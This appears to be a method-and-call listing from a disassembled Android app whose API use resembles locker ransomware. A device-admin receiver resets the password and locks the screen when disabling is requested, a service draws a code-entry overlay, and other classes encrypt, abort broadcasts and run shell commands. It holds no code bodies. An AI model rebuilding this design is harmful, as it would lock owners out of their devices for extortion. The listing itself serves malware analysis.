Lcom/h/R$style;-><init>()V [access_flags=public constructor] @ 0x13bc
Ljava/lang/Object;-><init>()V
Lcom/h/M;-><init>()V [access_flags=public constructor] @ 0x13d8
Landroid/app/Activity;-><init>()V
Lcom/h/M;->activiteDevice()V [access_flags=private] @ 0x13f4
Landroid/content/ComponentName;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
Landroid/content/Intent;->putExtra(Ljava/lang/String; Landroid/os/Parcelable;)Landroid/content/Intent;
Ljava/lang/NoClassDefFoundError;-><init>(Ljava/lang/String;)V
Landroid/content/Intent;-><init>(Ljava/lang/String;)V
Lcom/h/M;->startActivityForResult(Landroid/content/Intent; I)V
Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
Lcom/h/M;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x1488
Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
LLogCatBroadcaster;->start(Landroid/content/Context;)V [access_flags=public static synchronized] @ 0x2324
Lcom/h/DU;-><init>()V [access_flags=public constructor] @ 0x14d4
Lcom/h/DU;-><init>(Ljava/lang/String;)V [access_flags=public constructor] @ 0x14f4
Ljavax/crypto/Cipher;->init(I Ljava/security/Key;)V
Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
Lcom/h/DU;->getKey([B)Ljava/security/Key; [access_flags=private] @ 0x1644
Ljava/lang/Exception;->printStackTrace()V
Ljava/lang/String;->getBytes()[B
Ljavax/crypto/spec/SecretKeySpec;-><init>([B Ljava/lang/String;)V
Lcom/h/DU;->byteArr2HexStr([B)Ljava/lang/String; [access_flags=public static] @ 0x15a0
Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
Ljava/lang/StringBuffer;-><init>(I)V
Ljava/lang/Integer;->toString(I I)Ljava/lang/String;
Ljava/lang/StringBuffer;->append(C)Ljava/lang/StringBuffer;
Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
Lcom/h/DU;->hexStr2ByteArr(Ljava/lang/String;)[B [access_flags=public static] @ 0x16b0
Ljava/lang/Integer;->parseInt(Ljava/lang/String; I)I
Ljava/lang/String;-><init>([B I I)V
Lcom/h/DU;->decrypt(Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x1738
Lcom/h/DU;->decrypt([B)[B [access_flags=public] @ 0x1774
Ljava/lang/String;-><init>([B)V
Ljavax/crypto/Cipher;->doFinal([B)[B
Lcom/h/DU;->encrypt(Ljava/lang/String;)Ljava/lang/String; [access_flags=public] @ 0x179c
Lcom/h/DU;->encrypt([B)[B [access_flags=public] @ 0x17d0
Lcom/h/R;-><init>()V [access_flags=public constructor] @ 0x17f8
Lcom/h/s;-><init>()V [access_flags=public constructor] @ 0x1814
Landroid/app/Service;-><init>()V
Lcom/h/s;->c()V [access_flags=private] @ 0x18a8
Lcom/h/s;->getApplication()Landroid/app/Application;
Landroid/widget/TextView;->append(Ljava/lang/CharSequence;)V
Landroid/widget/EditText;->setHint(Ljava/lang/CharSequence;)V
Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
Ljava/lang/StringBuffer;-><init>()V
Landroid/view/WindowManager;->addView(Landroid/view/View; Landroid/view/ViewGroup$LayoutParams;)V
Lcom/h/s$100000001;-><init>(Lcom/h/s;)V [access_flags=constructor] @ 0x1e84
Landroid/view/View;->findViewById(I)Landroid/view/View;
Landroid/view/WindowManager$LayoutParams;-><init>()V
Landroid/view/LayoutInflater;->from(Landroid/content/Context;)Landroid/view/LayoutInflater;
Landroid/view/LayoutInflater;->inflate(I Landroid/view/ViewGroup;)Landroid/view/View;
Landroid/content/SharedPreferences;->getLong(Ljava/lang/String; J)J
Landroid/app/Application;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Ljava/lang/StringBuffer;->append(J)Ljava/lang/StringBuffer;
Lcom/h/s;->is(Landroid/content/Context;)Z [access_flags=public] @ 0x1af0
Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Landroid/net/NetworkInfo;->isAvailable()Z
Lcom/h/s;->onCreate()V [access_flags=public] @ 0x1b64
Ljava/lang/Long;->parseLong(Ljava/lang/String;)J
Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String; J)Landroid/content/SharedPreferences$Editor;
Ljava/lang/StringBuffer;->append(Ljava/lang/Object;)Ljava/lang/StringBuffer;
Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String; Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
Landroid/content/SharedPreferences$Editor;->commit()Z
Landroid/content/SharedPreferences;->getString(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
Landroid/app/Service;->onCreate()V
Ljava/lang/Math;->random()D
Lcom/h/s$100000000;->start()V
Lcom/h/s$100000000;-><init>(Lcom/h/s;)V [access_flags=constructor] @ 0x1fe0
Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
Lcom/h/s;->getApplicationContext()Landroid/content/Context;
Ljava/lang/Long;-><init>(J)V
Lcom/h/s;->getSharedPreferences(Ljava/lang/String; I)Landroid/content/SharedPreferences;
Lcom/h/s;->onStart(Landroid/content/Intent; I)V [access_flags=public] @ 0x1e3c
Landroid/app/Service;->onStart(Landroid/content/Intent; I)V
Lcom/h/s;->access$L1000001(Lcom/h/s;)Landroid/view/WindowManager; [access_flags=static synthetic] @ 0x1830
Lcom/h/s;->access$L1000002(Lcom/h/s;)Landroid/view/View; [access_flags=static synthetic] @ 0x184c
Lcom/h/s;->stopSelf()V
Lcom/h/R$string;-><init>()V [access_flags=public constructor] @ 0x1e68
Lcom/h/s$100000001;->onClick(Landroid/view/View;)V [access_flags=public] @ 0x1ec8
Landroid/text/Editable;->toString()Ljava/lang/String;
Landroid/widget/EditText;->getText()Landroid/text/Editable;
Ljava/lang/String;->equals(Ljava/lang/Object;)Z
Landroid/view/WindowManager;->removeView(Landroid/view/View;)V
Lcom/h/R$drawable;-><init>()V [access_flags=public constructor] @ 0x1f70
Lcom/h/R$id;-><init>()V [access_flags=public constructor] @ 0x1f8c
Lcom/h/R$xml;-><init>()V [access_flags=public constructor] @ 0x1fa8
Lcom/h/R$anim;-><init>()V [access_flags=public constructor] @ 0x1fc4
Ljava/lang/Thread;-><init>()V
Lcom/h/MyAdmin;-><init>()V [access_flags=public constructor] @ 0x2038
Landroid/app/admin/DeviceAdminReceiver;-><init>()V
Lcom/h/MyAdmin;->onDisableRequested(Landroid/content/Context; Landroid/content/Intent;)Ljava/lang/CharSequence; [access_flags=public] @ 0x2054
Lcom/h/MyAdmin;->getManager(Landroid/content/Context;)Landroid/app/admin/DevicePolicyManager;
Landroid/app/admin/DevicePolicyManager;->resetPassword(Ljava/lang/String; I)Z
Ljava/lang/Integer;->toString(I)Ljava/lang/String;
Landroid/app/admin/DeviceAdminReceiver;->onDisableRequested(Landroid/content/Context; Landroid/content/Intent;)Ljava/lang/CharSequence;
Landroid/app/admin/DevicePolicyManager;->lockNow()V
Lcom/h/MyAdmin;->onEnabled(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x20b8
Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
Landroid/app/admin/DeviceAdminReceiver;->onEnabled(Landroid/content/Context; Landroid/content/Intent;)V
Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
Lcom/h/MyAdmin;->onPasswordChanged(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x2174
Landroid/app/admin/DeviceAdminReceiver;->onPasswordChanged(Landroid/content/Context; Landroid/content/Intent;)V
Lcom/h/MyAdmin;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x21d4
Landroid/app/admin/DeviceAdminReceiver;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V
Landroid/util/Log;->i(Ljava/lang/String; Ljava/lang/String;)I
Lcom/h/bbb;-><init>()V [access_flags=public constructor] @ 0x2208
Landroid/content/BroadcastReceiver;-><init>()V
Lcom/h/bbb;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x2224
Lcom/h/bbb;->abortBroadcast()V
Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
Landroid/content/Intent;->getAction()Ljava/lang/String;
Lcom/h/BuildConfig;-><init>()V [access_flags=public constructor] @ 0x22c8
Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String; I)Landroid/content/pm/PackageInfo;
Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
Ljava/lang/Thread;->start()V
LLogCatBroadcaster;-><init>(Landroid/content/Context;)V [access_flags=private constructor] @ 0x22fc
Landroid/content/Context;->getApplicationInfo()Landroid/content/pm/ApplicationInfo;
Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
LLogCatBroadcaster;->run()V [access_flags=public] @ 0x240c
Landroid/content/Intent;-><init>()V
Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
Landroid/content/Context;->sendBroadcast(Landroid/content/Intent;)V
Landroid/content/Intent;->putExtra(Ljava/lang/String; [Ljava/lang/String;)Landroid/content/Intent;
Ljava/lang/Process;->getInputStream()Ljava/io/InputStream;
Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent;
Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
Ljava/io/BufferedReader;-><init>(Ljava/io/Reader; I)V
Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
Landroid/content/Intent;->setPackage(Ljava/lang/String;)Landroid/content/Intent;
Lcom/h/R$layout;-><init>()V [access_flags=public constructor] @ 0x24f4
Lcom/h/R$color;-><init>()V [access_flags=public constructor] @ 0x2510
Lcom/h/R$attr;-><init>()V [access_flags=public constructor] @ 0x252c
